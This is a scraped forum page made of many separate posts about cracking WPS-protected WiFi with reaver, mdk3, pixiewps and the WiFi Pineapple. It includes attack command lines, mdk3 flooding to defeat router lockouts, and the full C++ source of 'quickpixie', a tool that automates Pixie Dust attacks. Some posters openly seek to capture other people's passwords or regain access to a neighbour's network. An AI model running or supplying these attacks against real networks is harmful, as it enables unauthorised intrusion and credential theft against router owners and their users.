Search the Community

Hi guys, I have a problem: I want to hack my Wifi but all the attacks which I found only worked for WPS 1.0 but not on my WPS 2.0. Of course I am open minded for other ways to hack my wifi but none of the attacks which I found worked.🙄😞

More and more routers are becoming resistant to the Reaver magic. That's a good thing, because we all want easy and secure working hardware in our (grand-)parents' homes. But are they really secure? Today I had an encounter with a stubborn fellow that tried to stop me from brutally forcing myself into his backdoor. Good job boy, you kept me out, you're safe! Yeah right... So I fired up another command: mdk3 mon0 a -a [MAC] -m Let that rip for a minute, tried reaver again, bingo! It accepted my brute force methods again. But after a few minutes it locked up again. Time for some more of that mdk3 vaseline, let it rip again, and after reavering it accepted my crowbar. Now my question is, can someone explain to me or show me how to write some kind of script that does this automatically? So it should do this on it's own: reaver -i mon0 -b [MAC] -vv -S When it hits the AP rate limiter: ctrl-C mdk3 mon0 a -a [MAC] -m Run that for a minute or something and then again from the top: reaver -i mon0 -b [MAC] -vv -S When it hits the AP rate limiter: ctrl-C mdk3 mon0 a -a [MAC] -m And so on and so on and so on...

Helle all, I would like to install the latest version of reaver (1.6.1) this version can send an empty pin "NULL_PIN". I have a first error message to compile and I do not know how to install gcc, can you help me ? Git: https://github.com/t6x/reaver-wps-fork-t6x 0day with reaver 1.6.1: http://www.crack-wifi.com/forum/topic-12166-0day-crack-box-sfr-nb6v-en-deux-secondes-par-pin-null.html root@Pineapple:~/reaver-wps-fork-t6x-master/src# ./configure -ash: ./configure: Permission denied root@Pineapple:~/reaver-wps-fork-t6x-master/src# chmod +x configure root@Pineapple:~/reaver-wps-fork-t6x-master/src# ./configure checking for gcc... no checking for cc... no checking for cl.exe... no configure: error: in `/root/reaver-wps-fork-t6x-master/src': configure: error: no acceptable C compiler found in $PATH See `config.log' for more details root@Pineapple:~/reaver-wps-fork-t6x-master/src# Thank you Br, Netask

Yes before anyone says it I am aware of the command called "wash" that shows if the router is WPS protected it slipped my mind in the video but I really just made this cause I had some time so it isn't the greatest thing ever but I talk about my 3 favorite programs I use to crack WPS pins. Any way hope someone learns something new and I hope you all enjoy the video.

Hello, how do I feed reaver with a particular pin to attempt to find the wpa psk.

Change log: [v1.1] *Added .pixie files that are saved with the latest reaver's -H option as an acceptable input file with -i (ex. -i /path/to/bssid.pixie) They are treated differently than text files containing pixie data to be parsed, as they are simply set to be executable and then executed since the command is already built at the end of files in the .pixie format and in executable form. *Added -pd / --pixie-dir option which allows you to scan through a directory and all subdirectories within it for .pixie files to execute and/or text files containing pixie data to parse. This expands on the usefulness of the application by making it easier to get pixie data into it! *Added -pe / --pixie-exts option that lets you filter the files which the -pd option will even look at by extension. So for example if you have only .pixie files and .txt files containing pixie data you can prevent it from opening up just any file *.* (which is the default with --pixie-dir option) *Fix: Small Diffie Hellman doesn't have to be specified and shouldn't unless you know all your files containing pixie data all use small diffie hellman, it is determined that if pkr isn't set up to the point where it's about to execute, it assumes small diffie hellman. *Reorganized and cleaned up the code a bit Thanks to ephemient from stackoverflow for the clean and concise directory searching code. root@kali:~/codeblocks/quickpixie# ./quickpixie -h quickpixie 1.1 ~ AlfAlfa quickpixie extracts arguments for pixiewps from text copied to the clipboard which was output from reaver. It then uses those arguments to build the command to execute as well as executing it automatically... Now supports executing .pixie files and recursive directory searching for pixie data / .pixie files -i [file/-] or --input [file/-] uses a file/stdin for pixiewps command generation instead of the clipboard. -pd or --pixie-dir [pixie data files directory] will execute all .pixie files / build pixie commands in dir and sub dirs. -pe or --pixie-exts [ext1 ext2 ext3 etc] limits checking files for pixie data / executing .pixie files by extension -S is for small diffie hellman (PKR not needed) -b or --e-bssid is for passing a bssid to pixiewps if needed -f or --force is for --force -j or --just-display only prints the command(s) without executing -v is for most verbose output (-v 3) usage: quickpixie -f (pass --force to pixiewps) quickpixie -j (just display the generated command(s) but don't execute) quickpixie -v -b 11:22:33:44:55:66 -i data-for-pixie.txt (pass most verbose and bssid to pixiewps and use input from file) quickpixie -i pixiefile.pixie (execute a pixie file created from latest version of reaver with -H option) quickpixie -pd ~/reaverwork/pixiefiles (in specified dir and sub dirs, execute all .pixie files and read every single file for pixie data) quickpixie -pd /root/pixiedata -pe pixie txt (in specified dir and sub dirs, execute all .pixie files and only read .txt files for pixie data) pixie-data-piping-app -o | quickpixie -i - (pipe data from somewhere to be processed as input by quickpixie) In action with main mode (uses clipboard): http://webmshare.com/nrGXa Usually we use reaver with the -K 1 switch so reaver automatically does the pixie attack for us. However sometimes you might be running pixiewps manually and if you have done so, you know it's kind of a pain to build up the command copying and pasting the pke, pkr, ehash1, ehash2, and authkey one by one... So I created quickpixie to get around that! If you copy the whole block all the way from at least the PKE field to the E-Hash2 field you'll have the minimum required to run pixiewps. Then just run pixiewps and it builds and runs the command for you! :) I recommend also including the enonce as well even though it's optional as it can help and now it's no more trouble to do so(just start copying from enonce instead of pke). If there are multiple concatenations of usable pixiewps data, it also handles as many as you can throw at it. When using an input file "-i" instead, it ignores the clipboard and uses pixie data from that file to generate and execute pixiewps commands. You can also specify to use stdin instead of a regular file so you can pipe the output of another application and use it as input to generate pixiewps command lines from :D similar to: (piping words from crunch to aircrack) crunch 8 8 0123456789 | aircrack-ng MY-AP*.cap -w - You can: (round about way of doing "quickpixie -i multi-pixie.txt" cat multi-pixie.txt | quickpixie -i - and: (round about way of doing almost the same as just "quickpixie" with no arguments) xclip -selection clipboard -o | quickpixie -i - The best thing you could do with that is if you had a cool application that outputs data needed for pixie attacks maybe from your pixie attack cluster and you feed that into quickpixie for batch processing automated pixie attacking ;) Prerequisites: (* == comes with kali) pixiewps * xclip* (for standard mode which reads from the clipboard) g++ * (to compile it) Install: 1. download and move "quickpixie.cpp" to somewhere 2. cd to that location 3. g++ -std=c++0x -o quickpixie quickpixie.cpp (optional 4: cp quickpixie /usr/bin/quickpixie {recommended so you can execute it from anywhere}) Now from that directory execute it: ./quickpixie (or just quickpixie if you copied it to /usr/bin) Output of quickpixie with no arguments when example below was on the clipboard! Was on clipboard: PKE: 20:2a:5f:30:66:da:4d:25:9a:f3:72:09:b4:94:25:6a:5b:bc:87:49:27:64:ee:2f:c9:ad:b7:d6:33:7c:5c:b3:61:9d:7d:57:2a:9c:43:16:70:aa:0f:5e:71:20:da:f1:07:db:7e:71:db:3c:1e:32:2a:44:f9:f5:56:5d:ed:70:03:3c:e5:2d:59:34:ab:8b:36:1d:cc:cb:4c:87:bd:12:61:43:a3:05:c9:b4:79:8c:42:9e:12:6a:04:33:58:68:28:21:fd:2d:b0:b0:d0:cf:ab:23:f6:be:65:f7:6f:69:32:f3:4a:24:10:c9:72:48:9e:38:fa:1d:36:3b:65:95:73:93:c4:af:8f:86:04:77:3c:d8:ba:3a:c7:00:fc:a8:a1:c3:c7:74:aa:8b:ff:1d:f6:fd:6b:e1:a0:3d:0d:bf:82:49:3b:e1:a7:7b:f8:b3:95:9c:b0:bf:5d:99:e5:7e:80:6c:ee:4c:cb:46:f9:49:69:3e:35:c8:03:05:cf:6a [P] WPS Manufacturer: Ralink Technology, Corp. [P] WPS Model Name: Ralink Wireless Access Point [P] WPS Model Number: RTXXXX [P] Access Point Serial Number: XXXXXXXX [+] Received M1 message [P] R-Nonce: 00:bd:d0:7c:6e:74:47:4d:b4:e9:ba:56:20:03:62:d1 [P] PKR: 11:97:bc:f9:42:c0:ce:4b:07:09:1e:12:50:0b:bb:e1:8e:7d:0f:ef:98:a8:f9:95:a8:de:e3:7d:a9:e8:2d:2a:07:06:b7:2b:f3:17:2a:b9:f6:70:24:f4:89:9f:be:51:b7:df:90:d8:23:40:bd:36:8d:ef:1c:cd:ac:6a:1a:98:b4:fa:1c:d6:b0:39:e1:09:dd:18:e5:ea:6d:b3:d9:0c:92:f3:10:39:4f:60:36:ea:07:1d:4e:a0:74:2c:6d:d6:6b:6f:f5:41:2c:bb:a1:9f:95:00:cd:1b:b0:61:00:7b:47:03:37:15:6d:fb:43:a8:5d:60:6e:65:b2:10:e5:d8:d8:14:58:48:c4:4e:74:15:5d:ab:68:37:68:04:dc:fc:5b:3a:bd:dc:00:8a:59:ae:53:c0:98:75:06:0f:ed:80:5e:7d:b3:39:dd:12:ea:36:c2:52:47:46:c5:8b:59:ee:f2:90:e4:77:45:c7:dd:19:fa:3e:cd:90:50:f0:55:57 [P] AuthKey: 4b:d8:3f:55:aa:15:0a:33:e6:3a:03:b7:c8:c0:6e:51:dc:e6:50:98:33:d6:4c:63:5f:c8:5f:bf:ca:1c:a2:de [+] Sending M2 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [P] E-Hash1: 6b:2c:c1:b4:78:da:a4:e9:78:8c:96:8d:b0:85:68:51:ad:4c:43:84:9f:77:38:20:7a:5c:51:7d:94:d8:a9:69 [P] E-Hash2: 2e:db:1d:8f:f8:a6:34:5f:70:2c:33:c2:7e:28:17:45:65:5c:85:6c:17:d4:c5:fc:f7:9d:e8:98:89:b1:4c:33 quickpixie.cpp /* 12.24.2015 ~ AlfAlfa | quickpixie 1.1 Updated: 02.06.2016 */ #include <sys/stat.h> #include <ftw.h> #include <fnmatch.h> #include <string.h> #include <iostream> #include <memory> #include <vector> std::string enonce, rnonce, pke, pkr, authkey, ehash1, ehash2, optional_arguments, input_file, pixieDir; std::vector<std::string> pixieExts; bool just_display = false, small_diffie_hellman = false, most_verbose = false, piped_input = false, using_clipboard = true, using_pixie_dir = false; size_t pixiecount = 0; class ProcessExecutor { private: static std::unique_ptr<ProcessExecutor> mainInstance; public: FILE *file; std::string output; char buffer[4096]; ProcessExecutor() { memset(buffer, 0, sizeof(buffer)); } static std::unique_ptr<ProcessExecutor> make() { return std::unique_ptr<ProcessExecutor>(new ProcessExecutor()); } static ProcessExecutor *get() { if(!mainInstance.get()) mainInstance = make(); return mainInstance.get(); } int run(const char *cmd, bool printout = false) { file = popen(cmd,"r"); if(!file) return 1; output.clear(); while(fgets(buffer, sizeof(buffer), file) != 0) { output += buffer; if(printout) std::cout << buffer; } if(printout) std::cout << "\n"; pclose(file); return 0; } }; std::unique_ptr<ProcessExecutor> ProcessExecutor::mainInstance; class KeyValueGrabber { private: std::string *keysandvalues; public: size_t currentPosition, wouldBeNextPos, lastKeyPos; KeyValueGrabber() { currentPosition = 0; } std::string valueForKey(const char *key) { if(key != 0 && keysandvalues->length() > 0) { size_t valueStartPos = lastKeyPos = keysandvalues->find(key, currentPosition); if(valueStartPos != std::string::npos) { valueStartPos += strlen(key); size_t valueEndPos = keysandvalues->find("\n",valueStartPos); if(valueEndPos == std::string::npos) valueEndPos = keysandvalues->length(); wouldBeNextPos = valueEndPos + 1; return keysandvalues->substr(valueStartPos, (valueEndPos - valueStartPos)); } } return std::string(""); } size_t movePosition(size_t newPos = 0) { if(newPos == 0) currentPosition = wouldBeNextPos; else currentPosition = newPos; return lastKeyPos; } void resetPosition() { currentPosition = 0; } void set(std::string *p) { keysandvalues = p; } }; class QuickPixie { public: static void buildAndExecute() { std::string pixiecommand = "pixiewps -e " + pke; if(!pkr.empty()) pixiecommand += " -r " + pkr; pixiecommand += " -s " + ehash1 + " -z " + ehash2 + " -a " + authkey; if(!enonce.empty()) pixiecommand += " -n " + enonce; if(!rnonce.empty()) pixiecommand += " -m " + rnonce; if(!optional_arguments.empty()) pixiecommand += optional_arguments; //If small diffie hellman isn't set for every command, but pkr is still empty at this point, just assume small diffie hellman... if(!small_diffie_hellman && pkr.empty()) pixiecommand += " -S"; std::cout << "{" << ++pixiecount << "}\n" << pixiecommand << "\n\n"; if(!just_display) { auto pixiewps = ProcessExecutor::make(); pixiewps->run(pixiecommand.c_str(), true); } } static void executePixieFile(std::string pixieFilePath) { if(most_verbose) std::cout << "Executing pixie file: " << pixieFilePath << "\n"; chmod(pixieFilePath.c_str(), S_IRWXU); //set executable for owner //then execute it! if(pixieFilePath.find('/') == std::string::npos) ProcessExecutor::make()->run(("./" + pixieFilePath).c_str(), true); else ProcessExecutor::make()->run(pixieFilePath.c_str(), true); } static int parseTextFile(std::string pixieTextFilePath) { FILE *pixieTextFile = fopen(pixieTextFilePath.c_str(), "r"); if(!pixieTextFile) { std::cout << "ERROR: Could not open input file \"" << pixieTextFilePath << "\"\n"; return 1; } if(most_verbose) std::cout << "Parsing file for pixie data: " << pixieTextFilePath << "\n"; return parseTextFile(pixieTextFile); } static int parseTextFile(FILE *pixieTextFile) { if(!pixieTextFile) { std::cout << "ERROR: No file passed in to parseTextFile member function"; return 1; } std::unique_ptr<KeyValueGrabber> kv(new KeyValueGrabber()); auto exec = ProcessExecutor::get(); std::string currentLine; kv->set(&currentLine); while(fgets(exec->buffer, sizeof(exec->buffer), pixieTextFile) != 0) { currentLine = exec->buffer; std::string enonce = kv->valueForKey("E-Nonce: "); std::string pke = kv->valueForKey("PKE: "); std::string rnonce = kv->valueForKey("R-Nonce: "); std::string pkr = kv->valueForKey("PKR: "); std::string authkey = kv->valueForKey("AuthKey: "); std::string ehash1 = kv->valueForKey("E-Hash1: "); std::string ehash2 = kv->valueForKey("E-Hash2: "); if(!enonce.empty()) ::enonce = enonce; else if(!pke.empty()) ::pke = pke; else if(!rnonce.empty()) ::rnonce = rnonce; else if(!pkr.empty()) ::pkr = pkr; else if(!authkey.empty()) ::authkey = authkey; else if(!ehash1.empty()) ::ehash1 = ehash1; else if(!ehash2.empty()) ::ehash2 = ehash2; if(!(::pke.empty() || ::authkey.empty() || ::ehash1.empty() || ::ehash2.empty())) { buildAndExecute(); clear(); } } fclose(pixieTextFile); return 0; } static void parseClipboard() { if(most_verbose) std::cout << "Parsing pixie data from clipboard\n"; std::unique_ptr<KeyValueGrabber> kv(new KeyValueGrabber()); auto exec = ProcessExecutor::get(); exec->run("xclip -selection clipboard -o"); if(most_verbose) std::cout << exec->output << "\n\n"; kv->set(&exec->output); size_t pos = 0; while(pos != std::string::npos) { //optional arguments enonce = kv->valueForKey("E-Nonce: "); rnonce = kv->valueForKey("R-Nonce: "); //required arguments pke = kv->valueForKey("PKE: "); pkr = kv->valueForKey("PKR: "); authkey = kv->valueForKey("AuthKey: "); ehash1 = kv->valueForKey("E-Hash1: "); ehash2 = kv->valueForKey("E-Hash2: "); pos = kv->movePosition(); if(pos == std::string::npos) break; if(pke.empty() || authkey.empty() || ehash1.empty() || ehash2.empty()) { std::cout << "ERROR: Your copied to clipboard input for pixiewps is missing a required argument...\n"; std::cout << "PKE, PKR, E-Hash1, E-Hash2, and AuthKey are all required arguments.(except PKR when -S is used)\n"; std::cout << "You have:\n" << "PKE: " << pke << "\n" << "PKR: " << pkr << "\n" << "E-Hash1: " << ehash1 << "\n" << "E-Hash2: " << ehash2 << "\n" << "AuthKey: " << authkey << "\n"; continue; } buildAndExecute(); clear(); } } static std::string extensionOf(std::string filePath) { if(!filePath.empty()) { size_t ePos = filePath.rfind('.'); if(ePos != std::string::npos) { ePos++; return filePath.substr(ePos, filePath.length() - ePos); } } return std::string(""); } static void clear() { pke.clear(); pkr.clear(); authkey.clear(); ehash1.clear(); ehash2.clear(); enonce.clear(); rnonce.clear(); } }; //Thanks to ephemient from stackoverflow for this static int directorySearchCallback(const char *fpath, const struct stat *sb, int typeflag) { /* if it's a file */ if(typeflag == FTW_F) { /* for each filter, */ for(size_t i = 0; i < pixieExts.size(); i++) { /* if the filename matches the filter, */ if(fnmatch(pixieExts[i].c_str(), fpath, FNM_CASEFOLD) == 0) { if(QuickPixie::extensionOf(fpath) == "pixie") QuickPixie::executePixieFile(fpath); else QuickPixie::parseTextFile(fpath); break; } } } /* tell ftw to continue */ return 0; } int main(int argcount, char *args[]) { std::cout << "quickpixie 1.1 ~ AlfAlfa\n\n"; for(int i = 0; i < argcount; i++) { if(strcmp(args[i], "-j") == 0 || strcmp(args[i], "--just-display") == 0) just_display = true; else if(strcmp(args[i], "-f") == 0 || strcmp(args[i], "--force") == 0) optional_arguments += " --force"; else if(strcmp(args[i], "-S") == 0) { optional_arguments += " -S"; small_diffie_hellman = true; } else if(strcmp(args[i], "-v") == 0) { optional_arguments += " -v 3"; most_verbose = true; } else if(strcmp(args[i], "-b") == 0 || strcmp(args[i], "--e-bssid") == 0) { if(i == (argcount - 1)) break; optional_arguments += " -b "; optional_arguments += args[i+1]; } else if(strcmp(args[i], "-i") == 0 || strcmp(args[i], "--input") == 0) { if(i == (argcount - 1)) break; input_file = args[i+1]; if(input_file == "-") piped_input = true; using_clipboard = false; } else if(strcmp(args[i], "-pd") == 0 || strcmp(args[i], "--pixie-dir") == 0) { if(i == (argcount - 1)) break; pixieDir = args[i+1]; using_pixie_dir = true; } else if(strcmp(args[i], "-pe") == 0 || strcmp(args[i], "--pixie-exts") == 0) { if(i == (argcount - 1)) break; int z = i; while(*args[++z] != '-') { pixieExts.push_back(std::string("*.") + args[z]); if(z == (argcount - 1)) break; } } else if(strcmp(args[i], "-h") == 0 || strcmp(args[i], "--help") == 0) { std::cout << "quickpixie extracts arguments for pixiewps from text copied to the clipboard which was output from reaver.\n"; std::cout << "It then uses those arguments to build the command to execute as well as executing it automatically...\n"; std::cout << "Now supports executing .pixie files and recursive directory searching for pixie data / .pixie files\n"; std::cout << "-i [file/-] or --input [file/-] uses a file/stdin for pixiewps command generation instead of the clipboard.\n"; std::cout << "-pd or --pixie-dir [pixie data files directory] will execute all .pixie files / build pixie commands in dir and sub dirs.\n"; std::cout << "-pe or --pixie-exts [ext1 ext2 ext3 etc] limits checking files for pixie data / executing .pixie files by extension\n"; std::cout << "-S is for small diffie hellman (PKR not needed)\n"; std::cout << "-b or --e-bssid is for passing a bssid to pixiewps if needed\n"; std::cout << "-f or --force is for --force\n"; std::cout << "-j or --just-display only prints the command(s) without executing\n"; std::cout << "-v is for most verbose output (-v 3)\n"; std::cout << "usage:\nquickpixie -f (pass --force to pixiewps)\n"; std::cout << "quickpixie -j (just display the generated command(s) but don't execute)\n"; std::cout << "quickpixie -v -b 11:22:33:44:55:66 -i data-for-pixie.txt (pass most verbose and bssid to pixiewps and use input from file)\n"; std::cout << "quickpixie -i pixiefile.pixie (execute a pixie file created from latest version of reaver with -H option)\n"; std::cout << "quickpixie -pd ~/reaverwork/pixiefiles (in specified dir and sub dirs, execute all .pixie files and read every single file for pixie data)\n"; std::cout << "quickpixie -pd /root/pixiedata -pe pixie txt (in specified dir and sub dirs, execute all .pixie files and only read .txt files for pixie data)\n"; std::cout << "pixie-data-piping-app -o | quickpixie -i - (pipe data from somewhere to be processed as input by quickpixie)\n"; return 2; } } if(using_pixie_dir) { if(pixieExts.empty()) pixieExts.push_back("*.*"); if(most_verbose) { std::cout << "Filtering by extensions: {"; for(size_t i = 0; i < pixieExts.size(); i++) { std::cout << " " << pixieExts[i]; if(i != (pixieExts.size() - 1)) std::cout << ","; } std::cout << " }\n"; } ftw(pixieDir.c_str(), directorySearchCallback, 16); } else if(using_clipboard) QuickPixie::parseClipboard(); else { FILE *file = stdin; if(!piped_input) { file = fopen(input_file.c_str(),"r"); if(!file) { std::cout << "ERROR: Could not open input file \"" << input_file << "\"\n"; return 1; } fclose(file); if(QuickPixie::extensionOf(input_file) == "pixie") { QuickPixie::executePixieFile(input_file); return 0; } } QuickPixie::parseTextFile(file); } return 0; } Hope this is useful to you, happy holidays! :)

SSL stripping no longer works. I've been researching but gotten little results as to tutorials for other types of infusions. I want to get an infusion that can either get me wifi passwords or passwords to someone's accounts as they log into them. If possible, I would like some er infusions to start with downloading. I tried the wps infusion and it didn't work well with my router (which is why I want to use RubyReaver or Auto-Reaver). So, what other infusions could be used to monitor my other computer's web activities and the passwords that I get when I log in with my other computer (that I'm using as a target)? If possible, it would be nice if it was something I could use information I get from the PineAP log and input into such an infusion to get my passwords. I learned from this video about how to use the pineAP: https://www.youtube.com/watch?v=IdhuX4BEK6s&index=2&list=PLuXfzxj2yX_uCE8dPbP39rQIB0a8PkFHT So yeah, I don't want to buy too many new devices. I want to rely on my pineapple, but if possible I might want the documentation or something similar to learn to use such infusions. I might plug a wireless modem into my pineapple someday and go wardriving, but I want to learn to hack my own wifi first to learn before I go wardriving.

Ok so I'm kind of sad right now. I figured the Nano would have been like the original, with the ability to get modules and everything. I had no idea they would have to be rewritten. Anyways, I guess my question is: are modules that were available for MKIV going to be available eventually for the Nano? I've seen Evil Portal so far, but (no offense to the dev) I'm not really looking for that. I would love to see reaver and aircrack-type modules. I was so excited to be able to use reaver. I'm a big fan of pen testing (but i am still new to the area). I love working in Linux (i just started using Kali, but I've been using Mint previously). Another quick question too about my nano being connected on my laptop. I use a Bootable USB drive to run Kali. Not sure if that matters, but i finally got it to where i can have my wifi connected to my computer and my computer connected to my nano, but my computer doesn't seem to want to share my connection to the nano. I've done as much research as i could from these forums and have tried multiple IP combinations. My home connection to my wifi router is the generic 192.168.1.1. And the default for the pineapple I'm assuming is 172.16.42.42. But is that the pineapple IP or it's gateway? There's a couple 172.16.x.x IPs I've seen now and one is .42 and one is .1 so does the nano have a gateway? Or is it my ethernet port that is the gateway? Also, the default in wp6.sh for my computer's IP (Host IP) is a 172.16.x.x....why? I'm running a 192.168.x.x network on my router. Is that just the way pineapple sees me cuz of the gateway? My port for the direct connection usb connection is eth1 i believe. But there's also an eth0, which i have no idea why i have a virtual ethernet port. Probably has to do with me being on a USB-run Kali. But the default when i run wp6.sh is eth1. But when i change it to eth0 it stalls on me and nothing happens. So I've tried a bunch of different combinations between IP addresses and eth ports. At least i know my wireless port is wlan0 lol (Also i just thought about this, i do have a USB hub which connects up to 4 USB 3.0 connections, and i am running both the pineapple and Kali through that hub, which leads to the same usb port on my laptop. ..hmmm maybe that's a problem. ..) Anyways, sorry for the long read, i would just appreciate any help i can get. It works fine when i tether into my phone though. No problems there....just a drag i can't run reaver :'(

I think this is a completely different subject from the previous thread, so forgive me is this is double posting. I found this program called auto-reaver for backtrack: https://code.google.com/p/auto-reaver/ I edited it, changing the mon0 to wlan0mon in one of the scripts, titled "wash". I'm trying to edit it to work with kali 2.0. I did what one of the guys in this thread did: https://forums.kali.org/showthread.php?19641-Reaver-WPS-Locked-Situation-and-Useful-Link/page4 And I quote: I know how to do the first part of that and I did. I did both commands. But I'm lost as to how to change all gawk entries to mawk. I'll research it, but I'm asking because when I look at the script, I don't want to screw up the script as is. I want to edit it correctly. There are also some changes I think need to be made to make this backtrack program work for kali 2.0. Could someone explain what I need to read or how to change this properly to fit kali 2.0? There are various scripts.

Name WPS Features - Reaver options selection - Bully options selection - History - Select AP to attack from UI Screenshots

Hello, I have the password for a wifi. Now usually i could go into the router and search in it for the WPS pin. But this router is a cheap Nexxt model and i cant find the pin, but i know they're always at the back of the router which i cant get to. I need the WPS pin in case the person tries to change his password. Then it be easy for me to get the new pasword by using the WPS Pin. My question is can i retrieve the wps pin using the wifi password. Thannks so much,

I've been trying to get the Wifi Pineapple to be able to perform the pixie dust attack for quite a while, and I can't seem to be able to. I'm thinking the problem is with the modified Reaver you have to install, but I can't be sure. I've followed this guide: http://matthewhknight.com/autopixiewps/ (In case the link above is remove or something, just google AutoPixieWPS) On my PC and Laptop it works flawlessly, but whenever I try this on the pineapple, I'm no longer able to pick up WPS. If anyone has gotten this to work, or has any ideas, please let me know. Thanks.

So I'm not sure where to ask this, the mods at the Kali forums called this "general IT help" and deleted my question ha. Anyway, I've been playing around with Reaver again with my new router, and like the title says, can't seem to get any faster than 42-ish seconds per pin. The commands I used to even get it that 'fast' are as follows: Change my interface to same channel as router: iwconfig mon0 channel 1 Manually associate to my router: aireplay-ng -1 0 -a <router bssid> -h <my mac address, of mon0> -e <router essid> mon0 --ignore-negative-one My use of reaver: reaver -i mon0 -b <router bssid> -T 1 -f -N -S -vv All these commands are combinations of different suggestions I've seen places online, and this is what I've done to get it faster than the 50-60 sec/pin that I was getting :/ I've also tried using -r to make it pause for 60sec after 10 pin attempts, but then I would go up to 55 sec/pin again. I've had roughly -50 power the whole time during this test. Here's a chunk of my code running it overnight: [+] Received M1 message [+] Sending M2 message [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin 15535672 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 15535672 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] 14.19% complete @ 2014-08-09 08:21:06 (43 seconds/pin) [+] Max time remaining at this rate: 112:44:37 (9439 pins left to try) [+] Trying pin 15535672 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 15535672 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response Any suggestions that might speed this up? Thanks!!

Hi guys, anyone noticed that Reaver has been updated to 1.5? I think it's still in beta. It's changed a bit I think What do you guys think? how to install: make sure you have the libpcap and libsqlite3-dev libraries if you are on Kali. svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ reaver-wps-fork-read-onlycd reaver-wps-fork-read-only/src./configuremake distclean && ./configuresudo makesudo make install

Still Failed to associate with reaver same problem with Web UI. Firmware 2.8.1 I bought it for reaver........and it's useless. No one could give the answer,tried different order of commands..... Where're you my Hero !?!??!

I'm trying to parse the output of wash for automation. Here is what I have been playing aroung with *This is only part of the script I have it in a shell script that has been set as a boot mode. No matter how long wash runs as a daemon, I only get the start of wash in the log. If I manually execute wash as a daemon, It often does not work, sames results using wlan1 Side Note: I make sure the interface is up and in monitor mode before trying wash. Any help/ideas for achieving the parsing of wash would be great. I'm open to using anything other than bash aswell.

Hey hackers ! I'm working on the reaver module. I think I'm near a beta release. EDIT : v0.4 Released Features : System check (install reaver if not already installed) Choose where to install reaver (internal or USB) Select the interface to scan (based on networkmanager module) Select AP to attack (based on networkmanager module) Launch/Stop the attack Auto-Refresh output 3 switches (-c, -a, -S) enable/disable interface reworked layout Wiki page added in the pineapple wiki NEW : Fix bug : check if reaver is installed NEW : Propose install on usb only in case of detection of a mounted drive Future Features : Reaver options (all or most useful available arguments) Verbosity level Trigger alert on key found Start at boot [postponed][new] use of wash to scan ap (wps checker) -> I'm still having issue with this command, postponed until 100% working. [new] manage logs (internal/usb, move and copy, log cleaning (empty or delete) You choose ... Github (contribute coding, wiki (to merge with pineapple-wiki), ...) : https://github.com/Hackrylix/reaver Official Wiki : http://cloud.wifipin...u.php?id=reaver Credits to Whistle Master for the use of parts of his code. What kind of feature do you want ? How do you want I show the module page ? Any suggestion is welcome ! Cheers v0.4 screen shots :

Hey guys! I present you, Automator!, A module that automates attacks such as Deauthing and Karma, and more on the way! It asks you for a few options on each attacks then commences the attack. Features : -Automated attacks -Install packages that are needed -Add and Edit profiles for attacks -Blackout Attacks - Disable all LEDs, enable stealth mode and select an attack! Coming soon : -Edit back-end scripts to suit your needs -Add community attacks/automations to the module -Auto-detect wifi cards -Reaver Automation Sneak peak :

I have been using reaver to brute-force attack a WPA/WPA2 connection , But i seem to have a problem , The WPS pin cannot be found , It stops searching for a PIN at a specific place. Why is this happening ? And by the way i am using reaver from BEINI OS , Using Minidwep-gtk. I have searched for the WPA/WPA2 handshake and i've got it but i cannot crack it since i don't have a proper dictionary to and i don't have the means to download one. I look forward to a reply to this thread. Thank you ^_^

I have been using reaver to brute-force attack on my WPA/WPA2 connection , But i seem to have a problem , The WPS pin cannot be found , It stops searching for a PIN at a specific place. Why is this happening ? And by the way i am using reaver from BEINI OS , Using Minidwep-gtk. I have searched for the WPA/WPA2 handshake and i've got it but i'm not sure if it really has a PSK or not because i tried cracking it using Cloudcracker and so far unsuccessful. I've tried with the 1.2 billion dictionary word list and i was unsuccessful. The router i am using for the WiFi is a Belkin 3bb9 router which is known for it's security standards. So my question is how do i fix this outcome for a positive one and what should i try? Arguments used on reaver : I Used the following arguments in reaver : -a -v -S -x 20 -r 100:10 -l 300 And the output is : Waiting for beacon from : 08:86:3B:FD:CB:B0 Associalted with 08:86:3B:FD:CB:B0 (BSSID: belkin.3bb9) Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 (0.00% complete @ 2013-06-26 :18:53 (0 seconds/pin) WARNING 10 false connections in a row Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 And it goes on as the same... No change. Is there any solution to this? and I Used Wireless card : wlan0 Atheros AR9285 ath9k-[phy0]. I have atta

The heat is here; no more complaining of cold. Car stereos with huge bass with rap that blares with rappers of new and old. I have moved from my old digs; out to anew. Transferring my internet, is yet to be done. Out comes the Alfa, sniffing wpa2. Ifconfig wlan1 down... like a rerun. IW REG SET BO ... for extended range for more fun. Ifconfig wlan1 up... it is time for a game. The rules are simple, and plain. FInding who set their router with safe WPA. Kind of lame... but hell... I am at home with boxes surrounding me with no internet... how did he write this, though.... Have fun and stay cool!

CAn someone say what is my trouble with reaver and my MK4? i have latest firmware 2.8.0,only reaver installed and it's on usb. Other tools like sslstrip,DNSspoofing,MITM are working perfectly,but i need reaver leaved in dark corner. Tried to do brute forcing from command line via ssh and from web-UI on 3 different APs(and on mine too).Nothing works, reaver just waiting for beacon for sometime and then gives warning "Failed to associate". Tried to disable wlan0 - no effect. Tried airodump-ng :it's hopping channels and catching beacons as well. Tried wash: it finds all wps-enabled APs. I read on the Reaver project page(googlecode) that the problem might be in the Big-Endian.I understand what it mean,but can't solve this problem alone.any suggestions? PS i'll pray if it will be solved.

